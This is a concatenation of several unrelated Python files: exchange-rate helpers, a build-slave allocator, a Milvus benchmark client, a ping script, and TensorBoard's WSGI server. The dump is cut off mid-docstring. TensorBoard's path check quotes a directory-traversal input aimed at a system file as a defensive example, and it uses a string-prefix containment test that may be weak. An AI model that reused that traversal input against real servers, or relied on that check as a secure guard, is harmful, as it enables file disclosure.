    def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
        rate = self.exchange_rate()
        return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
            self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)

    def fiat_value(self, satoshis, rate):
        return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)

    def value_str(self, satoshis, rate):
        return self.format_fiat(self.fiat_value(satoshis, rate))

    def format_fiat(self, value):
        if value.is_nan():
            return _("No data")
        return "%s" % (self.ccy_amount_str(value, True))

    def history_rate(self, d_t):
        """Historical rate for datetime `d_t` as a Decimal (NaN if unknown)."""
        if d_t is None:
            return Decimal('NaN')
        rate = self.exchange.historical_rate(self.ccy, d_t)
        # Frequently there is no rate for today, until tomorrow :)
        # Use spot quotes in that case
        if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
            rate = self.exchange.quotes.get(self.ccy, 'NaN')
            self.history_used_spot = True
        return Decimal(rate)

    def historical_value_str(self, satoshis, d_t):
        return self.format_fiat(self.historical_value(satoshis, d_t))

    def historical_value(self, satoshis, d_t):
        return self.fiat_value(satoshis, self.history_rate(d_t))

    def timestamp_rate(self, timestamp):
        from .util import timestamp_to_datetime
        date = timestamp_to_datetime(timestamp)
        return self.history_rate(date)
|
slave_allocator.py | from app.util.log import get_logger
from app.util.ordered_set_queue import OrderedSetQueue
from app.util.safe_thread import SafeThread
from app.master.slave import SlaveMarkedForShutdownError
class SlaveAllocator(object):
    """
    The SlaveAllocator class is responsible for allocating slaves to prepared builds.
    """
    def __init__(self, scheduler_pool):
        """
        :type scheduler_pool: app.master.build_scheduler_pool.BuildSchedulerPool
        """
        self._logger = get_logger(__name__)
        self._scheduler_pool = scheduler_pool
        # FIFO of idle slaves; an OrderedSetQueue also de-duplicates entries.
        self._idle_slaves = OrderedSetQueue()
        # Daemon thread so an in-flight allocation never blocks shutdown.
        self._allocation_thread = SafeThread(
            target=self._slave_allocation_loop, name='SlaveAllocationLoop', daemon=True)

    def start(self):
        """
        Start the infinite loop that will pull off prepared builds from a synchronized queue
        and allocate them slaves.
        """
        if self._allocation_thread.is_alive():
            raise RuntimeError('Error: slave allocation loop was asked to start when its already running.')
        self._allocation_thread.start()

    def _slave_allocation_loop(self):
        """
        Builds wait in line for more slaves. This method executes in the background on another thread and
        watches for idle slaves, then gives them out to the waiting builds.
        """
        while True:
            # This is a blocking call that will block until there is a prepared build.
            build_scheduler = self._scheduler_pool.next_prepared_build_scheduler()

            while build_scheduler.needs_more_slaves():
                # Blocking get: waits until some slave becomes idle.
                claimed_slave = self._idle_slaves.get()

                # Remove dead and shutdown slaves from the idle queue
                if claimed_slave.is_shutdown() or not claimed_slave.is_alive(use_cached=False):
                    continue

                # The build may have completed while we were waiting for an idle slave, so check one more time.
                if build_scheduler.needs_more_slaves():
                    # Potential race condition here!  If the build completes after the if statement is checked,
                    # a slave will be allocated needlessly (and run slave.setup(), which can be significant work).
                    self._logger.info('Allocating {} to build {}.', claimed_slave, build_scheduler.build_id)
                    build_scheduler.allocate_slave(claimed_slave)
                else:
                    # Not needed after all -- put the slave back in the pool.
                    self.add_idle_slave(claimed_slave)

            self._logger.info('Done allocating slaves for build {}.', build_scheduler.build_id)

    def add_idle_slave(self, slave):
        """
        Add a slave to the idle queue.
        :type slave: Slave
        """
        try:
            slave.mark_as_idle()
            self._idle_slaves.put(slave)
        except SlaveMarkedForShutdownError:
            # Slave is being decommissioned -- silently drop it from rotation.
            pass
|
client.py | import pdb
import random
import logging
import json
import sys
import time, datetime
from multiprocessing import Process
from milvus import Milvus, IndexType, MetricType
logger = logging.getLogger("milvus_benchmark.client")

SERVER_HOST_DEFAULT = "127.0.0.1"
SERVER_PORT_DEFAULT = 19530


def time_wrapper(func):
    """
    This decorator prints the execution time for the decorated function.
    """
    from functools import wraps

    # functools.wraps preserves func.__name__/__doc__ on the wrapper --
    # without it every decorated method would log as "wrapper".
    @wraps(func)
    def wrapper(*args, **kwargs):
        start = time.time()
        result = func(*args, **kwargs)
        end = time.time()
        logger.info("Milvus {} run in {}s".format(func.__name__, round(end - start, 2)))
        return result
    return wrapper
class MilvusClient(object):
    """Thin wrapper around the Milvus SDK bound to a single table.

    Timed operations (insert/index/query/preload) are decorated with
    time_wrapper so their durations appear in the benchmark log.
    """

    def __init__(self, table_name=None, ip=None, port=None):
        self._milvus = Milvus()
        self._table_name = table_name
        # Connection errors propagate to the caller (the original wrapped
        # this in a no-op ``except: raise e`` which only broke tracebacks).
        if not ip:
            ip, port = SERVER_HOST_DEFAULT, SERVER_PORT_DEFAULT
        self._milvus.connect(host=ip, port=port)

    def __str__(self):
        return 'Milvus table %s' % self._table_name

    def check_status(self, status):
        """Raise if a Milvus status object is not OK."""
        if not status.OK():
            logger.error(status.message)
            raise Exception("Status not ok")

    def create_table(self, table_name, dimension, index_file_size, metric_type):
        """Create `table_name`; also binds this client to it if unbound."""
        if not self._table_name:
            self._table_name = table_name
        if metric_type == "l2":
            metric_type = MetricType.L2
        elif metric_type == "ip":
            metric_type = MetricType.IP
        else:
            # Unknown metric: logged, then the raw value is passed through
            # (preserved behavior -- the server rejects it downstream).
            logger.error("Not supported metric_type: %s" % metric_type)
        create_param = {'table_name': table_name,
                        'dimension': dimension,
                        'index_file_size': index_file_size,
                        "metric_type": metric_type}
        status = self._milvus.create_table(create_param)
        self.check_status(status)

    @time_wrapper
    def insert(self, X, ids=None):
        """Add vectors X (optionally with explicit ids); returns (status, ids)."""
        status, result = self._milvus.add_vectors(self._table_name, X, ids)
        self.check_status(status)
        return status, result

    @time_wrapper
    def create_index(self, index_type, nlist):
        """Build an index of the given type ("flat", "ivf_sq8", ...) on the table."""
        if index_type == "flat":
            index_type = IndexType.FLAT
        elif index_type == "ivf_flat":
            index_type = IndexType.IVFLAT
        elif index_type == "ivf_sq8":
            index_type = IndexType.IVF_SQ8
        elif index_type == "mix_nsg":
            index_type = IndexType.MIX_NSG
        elif index_type == "ivf_sq8h":
            index_type = IndexType.IVF_SQ8H
        index_params = {
            "index_type": index_type,
            "nlist": nlist,
        }
        logger.info("Building index start, table_name: %s, index_params: %s" % (self._table_name, json.dumps(index_params)))
        status = self._milvus.create_index(self._table_name, index=index_params, timeout=6 * 3600)
        self.check_status(status)

    def describe_index(self):
        return self._milvus.describe_index(self._table_name)

    def drop_index(self):
        logger.info("Drop index: %s" % self._table_name)
        return self._milvus.drop_index(self._table_name)

    @time_wrapper
    def query(self, X, top_k, nprobe):
        """Search the table for the top_k neighbours of each vector in X."""
        status, result = self._milvus.search_vectors(self._table_name, top_k, nprobe, X)
        self.check_status(status)
        return status, result

    def count(self):
        """Current row count of the table."""
        return self._milvus.get_table_row_count(self._table_name)[1]

    def delete(self, timeout=60):
        """Drop the table and poll (1s steps) until it is empty or `timeout` s.

        Bug fix: the original logged "Delete table timeout" when the poll
        loop exited EARLY (i.e. on success); the error is now reported only
        when the deadline is actually exhausted.
        """
        logger.info("Start delete table: %s" % self._table_name)
        self._milvus.delete_table(self._table_name)
        waited = 0
        while waited < timeout and self.count():
            time.sleep(1)
            waited += 1
        if waited >= timeout:
            logger.error("Delete table timeout")

    def describe(self):
        return self._milvus.describe_table(self._table_name)

    def exists_table(self):
        return self._milvus.has_table(self._table_name)

    @time_wrapper
    def preload_table(self):
        """Load the whole table into server memory (up to 3000 s)."""
        return self._milvus.preload_table(self._table_name, timeout=3000)
def fit(table_name, X):
    """Insert vectors X into `table_name` on a fresh connection, logging timing.

    Runs in its own process (see fit_concurrent), hence the new Milvus()
    connection per call.
    """
    milvus = Milvus()
    milvus.connect(host=SERVER_HOST_DEFAULT, port=SERVER_PORT_DEFAULT)
    start = time.time()
    status, ids = milvus.add_vectors(table_name, X)
    end = time.time()
    # Bug fix: the original called the Logger object itself
    # (``logger(status, ...)``), which raises TypeError.
    logger.info("%s %s", status, round(end - start, 2))
def fit_concurrent(table_name, process_num, vectors):
    """Run `fit` in process_num parallel worker processes and wait for all."""
    workers = []
    for _ in range(process_num):
        worker = Process(target=fit, args=(table_name, vectors, ))
        workers.append(worker)
        worker.start()
    for worker in workers:
        worker.join()
if __name__ == "__main__":
    # Ad-hoc smoke test: insert random vectors, build an index, run a query.
    # The commented-out lines below are the author's exploratory variants and
    # are kept for reference.
    # table_name = "sift_2m_20_128_l2"
    table_name = "test_tset1"
    m = MilvusClient(table_name)
    # m.create_table(table_name, 128, 50, "l2")
    print(m.describe())
    # print(m.count())
    # print(m.describe_index())
    # 5 batches x 10000 random 128-dim vectors.
    insert_vectors = [[random.random() for _ in range(128)] for _ in range(10000)]
    for i in range(5):
        m.insert(insert_vectors)
    print(m.create_index("ivf_sq8h", 16384))
    X = [insert_vectors[0]]
    top_k = 10
    nprobe = 10
    print(m.query(X, top_k, nprobe))
    # # # print(m.drop_index())
    # # print(m.describe_index())
    # # sys.exit()
    # # # insert_vectors = [[random.random() for _ in range(128)] for _ in range(100000)]
    # # # for i in range(100):
    # # #     m.insert(insert_vectors)
    # # # time.sleep(5)
    # # # print(m.describe_index())
    # # # print(m.drop_index())
    # # m.create_index("ivf_sq8h", 16384)
    # print(m.count())
    # print(m.describe_index())
    # sys.exit()
    # print(m.create_index("ivf_sq8h", 16384))
    # print(m.count())
    # print(m.describe_index())
    import numpy as np

    def mmap_fvecs(fname):
        # Memory-map an .fvecs file: each record is [dim:int32, dim floats];
        # strip the leading dimension column and reinterpret as float32.
        x = np.memmap(fname, dtype='int32', mode='r')
        d = x[0]
        return x.view('float32').reshape(-1, d + 1)[:, 1:]

    # NOTE(review): hard-coded benchmark-host path; fails elsewhere.
    print(mmap_fvecs("/poc/deep1b/deep1B_queries.fvecs"))
    # SIFT_SRC_QUERY_DATA_DIR = '/poc/yuncong/ann_1000m'
    # file_name = SIFT_SRC_QUERY_DATA_DIR+'/'+'query.npy'
    # data = numpy.load(file_name)
    # query_vectors = data[0:2].tolist()
    # print(len(query_vectors))
    # results = m.query(query_vectors, 10, 10)
    # result_ids = []
    # for result in results[1]:
    #     tmp = []
    #     for item in result:
    #         tmp.append(item.id)
    #     result_ids.append(tmp)
    # print(result_ids[0][:10])
    # # gt
    # file_name = SIFT_SRC_QUERY_DATA_DIR+"/gnd/"+"idx_1M.ivecs"
    # a = numpy.fromfile(file_name, dtype='int32')
    # d = a[0]
    # true_ids = a.reshape(-1, d + 1)[:, 1:].copy()
    # print(true_ids[:3, :2])
    # print(len(true_ids[0]))
    # import numpy as np
    # import sklearn.preprocessing
    # def mmap_fvecs(fname):
    #     x = np.memmap(fname, dtype='int32', mode='r')
    #     d = x[0]
    #     return x.view('float32').reshape(-1, d + 1)[:, 1:]
    # data = mmap_fvecs("/poc/deep1b/deep1B_queries.fvecs")
    # print(data[0], len(data[0]), len(data))
    # total_size = 10000
    # # total_size = 1000000000
    # file_size = 1000
    # # file_size = 100000
    # file_num = total_size // file_size
    # for i in range(file_num):
    #     fname = "/test/milvus/raw_data/deep1b/binary_96_%05d" % i
    #     print(fname, i*file_size, (i+1)*file_size)
    #     single_data = data[i*file_size : (i+1)*file_size]
    #     single_data = sklearn.preprocessing.normalize(single_data, axis=1, norm='l2')
    #     np.save(fname, single_data)
|
ping.py | #!/usr/local/bin/python
# -*- coding=utf-8 -*-
from __future__ import print_function
import subprocess
import threading
def is_reacheable(ip):
    """Ping `ip` once and print whether it responded.

    `subprocess.call` returns the ping process's exit status: 0 means a
    reply was received, non-zero means no reply or an error.
    """
    # Fixed two bugs: (1) the original passed "-c", "1", ip as separate
    # positional arguments to subprocess.call (interpreted as bufsize /
    # executable / stdin, raising TypeError) instead of inside the argv
    # list; (2) it treated a NON-zero exit status as "alive", inverting
    # the result.
    if subprocess.call(["ping", "-c", "1", ip]) == 0:
        print("{0} is alive".format(ip))
    else:
        print("{0} is unreacheable".format(ip))
def main():
    """Read the candidate IPs from ips.txt and echo them one by one.

    The threaded reachability sweep is still disabled (commented out in the
    original); currently this only prints the file contents.
    """
    with open('ips.txt') as ip_file:
        lines = ip_file.readlines()
        print(lines)
    threads = []
    for line in lines:
        print(line)
# Script entry point: run the sweep only when executed directly.
if __name__ == '__main__':
    main()
application.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
TensorBoardApplication constructs TensorBoard as a WSGI application.
It handles serving static assets, and implements TensorBoard data APIs.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import imghdr
import mimetypes
import os
import re
import threading
import time
import six
from six import StringIO
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
from six.moves.urllib import parse as urlparse
from werkzeug import wrappers
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import tf_logging as logging
from tensorflow.tensorboard.backend import process_graph
from tensorflow.tensorboard.backend.event_processing import event_accumulator
from tensorflow.tensorboard.backend.event_processing import event_multiplexer
from tensorflow.tensorboard.lib.python import http_util
from tensorflow.tensorboard.plugins.debugger import debugger_plugin
from tensorflow.tensorboard.plugins.projector import projector_plugin
# How many items of each tag type the event accumulator retains per run.
DEFAULT_SIZE_GUIDANCE = {
    event_accumulator.COMPRESSED_HISTOGRAMS: 500,
    event_accumulator.IMAGES: 10,
    event_accumulator.AUDIO: 10,
    event_accumulator.SCALARS: 1000,
    event_accumulator.HEALTH_PILLS: 100,
    event_accumulator.HISTOGRAMS: 50,
}

# URL path components used to build the data-serving routes below.
DATA_PREFIX = '/data'
LOGDIR_ROUTE = '/logdir'
RUNS_ROUTE = '/runs'
PLUGIN_PREFIX = '/plugin'
SCALARS_ROUTE = '/' + event_accumulator.SCALARS
IMAGES_ROUTE = '/' + event_accumulator.IMAGES
AUDIO_ROUTE = '/' + event_accumulator.AUDIO
HISTOGRAMS_ROUTE = '/' + event_accumulator.HISTOGRAMS
COMPRESSED_HISTOGRAMS_ROUTE = '/' + event_accumulator.COMPRESSED_HISTOGRAMS
INDIVIDUAL_IMAGE_ROUTE = '/individualImage'
INDIVIDUAL_AUDIO_ROUTE = '/individualAudio'
GRAPH_ROUTE = '/' + event_accumulator.GRAPH
RUN_METADATA_ROUTE = '/' + event_accumulator.RUN_METADATA
# Frontend tab paths that should all be answered with the index page.
TAB_ROUTES = ['', '/events', '/images', '/audio', '/graphs', '/histograms']
_IMGHDR_TO_MIMETYPE = {
'bmp': 'image/bmp',
'gif': 'image/gif',
'jpeg': 'image/jpeg',
'png': 'image/png'
}
_DEFAULT_IMAGE_MIMETYPE = 'application/octet-stream'
def _content_type_for_image(encoded_image_string):
image_type = imghdr.what(None, encoded_image_string)
return _IMGHDR_TO_MIMETYPE.get(image_type, _DEFAULT_IMAGE_MIMETYPE)
class _OutputFormat(object):
  """An enum used to list the valid output formats for API calls.

  Not all API calls support all formats (for example, only scalars and
  compressed histograms support CSV).
  """
  # Values match the `?format=` query-string token clients send.
  JSON = 'json'
  CSV = 'csv'
def standard_tensorboard_wsgi(logdir, purge_orphaned_data, reload_interval):
  """Construct a TensorBoardWSGIApp with standard plugins and multiplexer.

  Args:
    logdir: The logdir spec (see parse_event_files_spec) to load runs from.
    purge_orphaned_data: Whether the multiplexer should purge orphaned data.
    reload_interval: Seconds between multiplexer reloads (0/None = once).

  Returns:
    A TensorBoardWSGIApp wired with the debugger and projector plugins.
  """
  multiplexer = event_multiplexer.EventMultiplexer(
      size_guidance=DEFAULT_SIZE_GUIDANCE,
      purge_orphaned_data=purge_orphaned_data)
  # Debugger and projector are the two plugins bundled by default.
  plugins = {
      debugger_plugin.PLUGIN_PREFIX_ROUTE:
          debugger_plugin.DebuggerPlugin(multiplexer),
      projector_plugin.PLUGIN_PREFIX_ROUTE:
          projector_plugin.ProjectorPlugin(),
  }
  return TensorBoardWSGIApp(logdir, plugins, multiplexer, reload_interval)
class TensorBoardWSGIApp(object):
  """The TensorBoard application, conforming to WSGI spec."""

  # How many samples to include in sampling API calls by default.
  DEFAULT_SAMPLE_COUNT = 10

  # NOTE TO MAINTAINERS: An accurate Content-Length MUST be specified on all
  # responses using send_header.
  protocol_version = 'HTTP/1.1'

  def __init__(self, logdir, plugins, multiplexer, reload_interval):
    """Constructs the TensorBoard application.

    Args:
      logdir: the logdir spec that describes where data will be loaded.
        may be a directory, or comma,separated list of directories, or colons
        can be used to provide named directories
      plugins: Map from plugin name to plugin application
      multiplexer: The EventMultiplexer with TensorBoard data to serve
      reload_interval: How often (in seconds) to reload the Multiplexer

    Returns:
      A WSGI application that implements the TensorBoard backend.
    """
    self._logdir = logdir
    self._plugins = plugins
    self._multiplexer = multiplexer
    self.tag = get_tensorboard_tag()
    path_to_run = parse_event_files_spec(self._logdir)
    if reload_interval:
      # Reload on a background daemon thread every reload_interval seconds.
      start_reloading_multiplexer(self._multiplexer, path_to_run,
                                  reload_interval)
    else:
      reload_multiplexer(self._multiplexer, path_to_run)
    # Static routing table: URL path -> WSGI sub-application.
    self.data_applications = {
        DATA_PREFIX + LOGDIR_ROUTE:
            self._serve_logdir,
        DATA_PREFIX + SCALARS_ROUTE:
            self._serve_scalars,
        DATA_PREFIX + GRAPH_ROUTE:
            self._serve_graph,
        DATA_PREFIX + RUN_METADATA_ROUTE:
            self._serve_run_metadata,
        DATA_PREFIX + HISTOGRAMS_ROUTE:
            self._serve_histograms,
        DATA_PREFIX + COMPRESSED_HISTOGRAMS_ROUTE:
            self._serve_compressed_histograms,
        DATA_PREFIX + IMAGES_ROUTE:
            self._serve_images,
        DATA_PREFIX + INDIVIDUAL_IMAGE_ROUTE:
            self._serve_image,
        DATA_PREFIX + AUDIO_ROUTE:
            self._serve_audio,
        DATA_PREFIX + INDIVIDUAL_AUDIO_ROUTE:
            self._serve_individual_audio,
        DATA_PREFIX + RUNS_ROUTE:
            self._serve_runs,
        '/app.js':
            self._serve_js
    }
    # Serve the routes from the registered plugins using their name as the route
    # prefix. For example if plugin z has two routes /a and /b, they will be
    # served as /data/plugin/z/a and /data/plugin/z/b.
    for name in self._plugins:
      try:
        plugin = self._plugins[name]
        plugin_apps = plugin.get_plugin_apps(self._multiplexer.RunPaths(),
                                             self._logdir)
      except Exception as e:  # pylint: disable=broad-except
        # A broken plugin must not take down the whole application.
        logging.warning('Plugin %s failed. Exception: %s', name, str(e))
        continue
      for route, app in plugin_apps.items():
        path = DATA_PREFIX + PLUGIN_PREFIX + '/' + name + route
        self.data_applications[path] = app

  # We use underscore_names for consistency with inherited methods.

  def _image_response_for_run(self, run_images, run, tag):
    """Builds a JSON-serializable object with information about run_images.

    Args:
      run_images: A list of event_accumulator.ImageValueEvent objects.
      run: The name of the run.
      tag: The name of the tag the images all belong to.

    Returns:
      A list of dictionaries containing the wall time, step, URL, width, and
      height for each image.
    """
    response = []
    for index, run_image in enumerate(run_images):
      response.append({
          'wall_time': run_image.wall_time,
          'step': run_image.step,
          # We include the size so that the frontend can add that to the <img>
          # tag so that the page layout doesn't change when the image loads.
          'width': run_image.width,
          'height': run_image.height,
          'query': self._query_for_individual_image(run, tag, index)
      })
    return response

  def _audio_response_for_run(self, run_audio, run, tag):
    """Builds a JSON-serializable object with information about run_audio.

    Args:
      run_audio: A list of event_accumulator.AudioValueEvent objects.
      run: The name of the run.
      tag: The name of the tag the images all belong to.

    Returns:
      A list of dictionaries containing the wall time, step, URL, and
      content_type for each audio clip.
    """
    response = []
    for index, run_audio_clip in enumerate(run_audio):
      response.append({
          'wall_time': run_audio_clip.wall_time,
          'step': run_audio_clip.step,
          'content_type': run_audio_clip.content_type,
          'query': self._query_for_individual_audio(run, tag, index)
      })
    return response

  def _path_is_safe(self, path):
    """Check path is safe (stays within current directory).

    This is for preventing directory-traversal attacks.

    Args:
      path: The path to check for safety.

    Returns:
      True if the given path stays within the current directory, and false
      if it would escape to a higher directory. E.g. _path_is_safe('index.html')
      returns true, but _path_is_safe('../../../etc/password') returns false.
    """
    base = os.path.abspath(os.curdir)
    absolute_path = os.path.abspath(path)
    prefix = os.path.commonprefix([base, absolute_path])
    return prefix == base

  @wrappers.Request.application
  def _serve_logdir(self, request):
    """Respond with a JSON object containing this TensorBoard's logdir."""
    return http_util.Respond(
        request, {'logdir': self._logdir}, 'application/json')

  @wrappers.Request.application
  def _serve_scalars(self, request):
    """Given a tag and single run, return array of ScalarEvents."""
    # TODO(cassandrax): return HTTP status code for malformed requests
    tag = request.args.get('tag')
    run = request.args.get('run')
    values = self._multiplexer.Scalars(run, tag)
    if request.args.get('format') == _OutputFormat.CSV:
      string_io = StringIO()
      writer = csv.writer(string_io)
      writer.writerow(['Wall time', 'Step', 'Value'])
      writer.writerows(values)
      return http_util.Respond(request, string_io.getvalue(), 'text/csv')
    else:
      return http_util.Respond(request, values, 'application/json')

  @wrappers.Request.application
  def _serve_graph(self, request):
    """Given a single run, return the graph definition in json format."""
    run = request.args.get('run', None)
    if run is None:
      return http_util.Respond(
          request, 'query parameter "run" is required', 'text/plain', 400)
    try:
      graph = self._multiplexer.Graph(run)
    except ValueError:
      return http_util.Respond(request, '404 Not Found', code=404)
    limit_attr_size = request.args.get('limit_attr_size', None)
    if limit_attr_size is not None:
      try:
        limit_attr_size = int(limit_attr_size)
      except ValueError:
        return http_util.Respond(
            request, 'query parameter `limit_attr_size` must be integer',
            'text/plain', 400)
    large_attrs_key = request.args.get('large_attrs_key', None)
    try:
      process_graph.prepare_graph_for_ui(graph, limit_attr_size,
                                         large_attrs_key)
    except ValueError as e:
      # Fixed: ValueError has no `.message` attribute on Python 3 (the
      # original `e.message` raised AttributeError); str(e) works on both.
      return http_util.Respond(request, str(e), 'text/plain', 400)
    return http_util.Respond(request, str(graph), 'text/x-protobuf')  # pbtxt

  @wrappers.Request.application
  def _serve_run_metadata(self, request):
    """Given a tag and a TensorFlow run, return the session.run() metadata."""
    tag = request.args.get('tag', None)
    run = request.args.get('run', None)
    if tag is None:
      return http_util.Respond(
          request, 'query parameter "tag" is required', 'text/plain', 400)
    if run is None:
      return http_util.Respond(
          request, 'query parameter "run" is required', 'text/plain', 400)
    try:
      run_metadata = self._multiplexer.RunMetadata(run, tag)
    except ValueError:
      return http_util.Respond(request, '404 Not Found', code=404)
    return http_util.Respond(
        request, str(run_metadata), 'text/x-protobuf')  # pbtxt

  @wrappers.Request.application
  def _serve_histograms(self, request):
    """Given a tag and single run, return an array of histogram values."""
    tag = request.args.get('tag')
    run = request.args.get('run')
    values = self._multiplexer.Histograms(run, tag)
    return http_util.Respond(request, values, 'application/json')

  @wrappers.Request.application
  def _serve_compressed_histograms(self, request):
    """Given a tag and single run, return an array of compressed histograms."""
    tag = request.args.get('tag')
    run = request.args.get('run')
    compressed_histograms = self._multiplexer.CompressedHistograms(run, tag)
    if request.args.get('format') == _OutputFormat.CSV:
      string_io = StringIO()
      writer = csv.writer(string_io)
      # Build the headers; we have two columns for timing and two columns for
      # each compressed histogram bucket.
      headers = ['Wall time', 'Step']
      if compressed_histograms:
        bucket_count = len(compressed_histograms[0].compressed_histogram_values)
        for i in xrange(bucket_count):
          headers += ['Edge %d basis points' % i, 'Edge %d value' % i]
      writer.writerow(headers)
      for compressed_histogram in compressed_histograms:
        row = [compressed_histogram.wall_time, compressed_histogram.step]
        for value in compressed_histogram.compressed_histogram_values:
          row += [value.rank_in_bps, value.value]
        writer.writerow(row)
      return http_util.Respond(request, string_io.getvalue(), 'text/csv')
    else:
      return http_util.Respond(
          request, compressed_histograms, 'application/json')

  @wrappers.Request.application
  def _serve_images(self, request):
    """Given a tag and list of runs, serve a list of images.

    Note that the images themselves are not sent; instead, we respond with URLs
    to the images. The frontend should treat these URLs as opaque and should not
    try to parse information about them or generate them itself, as the format
    may change.

    Args:
      request: A werkzeug.wrappers.Request object.

    Returns:
      A werkzeug.Response application.
    """
    tag = request.args.get('tag')
    run = request.args.get('run')
    images = self._multiplexer.Images(run, tag)
    response = self._image_response_for_run(images, run, tag)
    return http_util.Respond(request, response, 'application/json')

  @wrappers.Request.application
  def _serve_image(self, request):
    """Serves an individual image."""
    tag = request.args.get('tag')
    run = request.args.get('run')
    index = int(request.args.get('index'))
    image = self._multiplexer.Images(run, tag)[index]
    encoded_image_string = image.encoded_image_string
    content_type = _content_type_for_image(encoded_image_string)
    return http_util.Respond(request, encoded_image_string, content_type)

  def _query_for_individual_image(self, run, tag, index):
    """Builds a URL for accessing the specified image.

    This should be kept in sync with _serve_image. Note that the URL is *not*
    guaranteed to always return the same image, since images may be unloaded
    from the reservoir as new images come in.

    Args:
      run: The name of the run.
      tag: The tag.
      index: The index of the image. Negative values are OK.

    Returns:
      A string representation of a URL that will load the index-th
      sampled image in the given run with the given tag.
    """
    query_string = urllib.parse.urlencode({
        'run': run,
        'tag': tag,
        'index': index
    })
    return query_string

  @wrappers.Request.application
  def _serve_audio(self, request):
    """Given a tag and list of runs, serve a list of audio.

    Note that the audio clips themselves are not sent; instead, we respond with
    URLs to the audio. The frontend should treat these URLs as opaque and should
    not try to parse information about them or generate them itself, as the
    format may change.

    Args:
      request: A werkzeug.wrappers.Request object.

    Returns:
      A werkzeug.Response application.
    """
    tag = request.args.get('tag')
    run = request.args.get('run')
    audio_list = self._multiplexer.Audio(run, tag)
    response = self._audio_response_for_run(audio_list, run, tag)
    return http_util.Respond(request, response, 'application/json')

  @wrappers.Request.application
  def _serve_individual_audio(self, request):
    """Serves an individual audio clip."""
    tag = request.args.get('tag')
    run = request.args.get('run')
    index = int(request.args.get('index'))
    audio = self._multiplexer.Audio(run, tag)[index]
    return http_util.Respond(
        request, audio.encoded_audio_string, audio.content_type)

  def _query_for_individual_audio(self, run, tag, index):
    """Builds a URL for accessing the specified audio.

    This should be kept in sync with _serve_individual_audio. Note that the URL
    is *not* guaranteed to always return the same audio, since audio may be
    unloaded from the reservoir as new audio comes in.

    Args:
      run: The name of the run.
      tag: The tag.
      index: The index of the audio. Negative values are OK.

    Returns:
      A string representation of a URL that will load the index-th
      sampled audio in the given run with the given tag.
    """
    query_string = urllib.parse.urlencode({
        'run': run,
        'tag': tag,
        'index': index
    })
    return query_string

  @wrappers.Request.application
  def _serve_runs(self, request):
    """WSGI app serving a JSON object about runs and tags.

    Returns a mapping from runs to tagType to list of tags for that run.

    Args:
      request: A werkzeug request

    Returns:
      A werkzeug Response with the following content:
      {runName: {images: [tag1, tag2, tag3],
                 audio: [tag4, tag5, tag6],
                 scalars: [tagA, tagB, tagC],
                 histograms: [tagX, tagY, tagZ],
                 firstEventTimestamp: 123456.789}}
    """
    runs = self._multiplexer.Runs()
    for run_name, run_data in runs.items():
      try:
        run_data['firstEventTimestamp'] = self._multiplexer.FirstEventTimestamp(
            run_name)
      except ValueError:
        logging.warning('Unable to get first event timestamp for run %s',
                        run_name)
        run_data['firstEventTimestamp'] = None
    return http_util.Respond(request, runs, 'application/json')

  @wrappers.Request.application
  def _serve_index(self, request):
    """Serves the index page (i.e., the tensorboard app itself)."""
    return self._serve_static_file(request, '/dist/index.html')

  @wrappers.Request.application
  def _serve_js(self, request):
    """Serves the JavaScript for the index page."""
    return self._serve_static_file(request, '/dist/app.js')

  def _serve_static_file(self, request, path):
    """Serves the static file located at the given path.

    Args:
      request: A werkzeug Request
      path: The path of the static file, relative to the tensorboard/ directory.

    Returns:
      A werkzeug.Response application.
    """
    # Strip off the leading forward slash.
    orig_path = path.lstrip('/')
    if not self._path_is_safe(orig_path):
      logging.warning('path not safe: %s', orig_path)
      return http_util.Respond(request, 'Naughty naughty!', 'text/plain', 400)
    # Resource loader wants a path relative to //WORKSPACE/tensorflow.
    path = os.path.join('tensorboard', orig_path)
    # Open the file and read it.
    try:
      contents = resource_loader.load_resource(path)
    except IOError:
      # For compatibility with latest version of Bazel, we renamed bower
      # packages to use '_' rather than '-' in their package name.
      # This means that the directory structure is changed too.
      # So that all our recursive imports work, we need to modify incoming
      # requests to map onto the new directory structure.
      path = orig_path
      components = path.split('/')
      components[0] = components[0].replace('-', '_')
      path = ('/').join(components)
      # Bazel keeps all the external dependencies in //WORKSPACE/external.
      # and resource loader wants a path relative to //WORKSPACE/tensorflow/.
      path = os.path.join('../external', path)
      try:
        contents = resource_loader.load_resource(path)
      except IOError:
        logging.warning('path %s not found, sending 404', path)
        return http_util.Respond(request, 'Not found', 'text/plain', code=404)
    mimetype, content_encoding = mimetypes.guess_type(path)
    mimetype = mimetype or 'application/octet-stream'
    return http_util.Respond(
        request,
        contents,
        mimetype,
        expires=3600,
        content_encoding=content_encoding)

  def __call__(self, environ, start_response):  # pylint: disable=invalid-name
    """Central entry point for the TensorBoard application.

    This method handles routing to sub-applications. It does simple routing
    using regular expression matching.

    This __call__ method conforms to the WSGI spec, so that instances of this
    class are WSGI applications.

    Args:
      environ: See WSGI spec.
      start_response: See WSGI spec.

    Returns:
      A werkzeug Response.
    """
    request = wrappers.Request(environ)
    parsed_url = urlparse.urlparse(request.path)
    # Remove a trailing slash, if present.
    clean_path = parsed_url.path
    if clean_path.endswith('/'):
      clean_path = clean_path[:-1]
    # pylint: disable=too-many-function-args
    if clean_path in self.data_applications:
      return self.data_applications[clean_path](environ, start_response)
    elif clean_path in TAB_ROUTES:
      return self._serve_index(environ, start_response)
    else:
      # Fall back to static-file serving for anything unrecognized.
      return self._serve_static_file(request, clean_path)(environ,
                                                          start_response)
    # pylint: enable=too-many-function-args
def parse_event_files_spec(logdir):
  """Parses `logdir` into a map from paths to run group names.

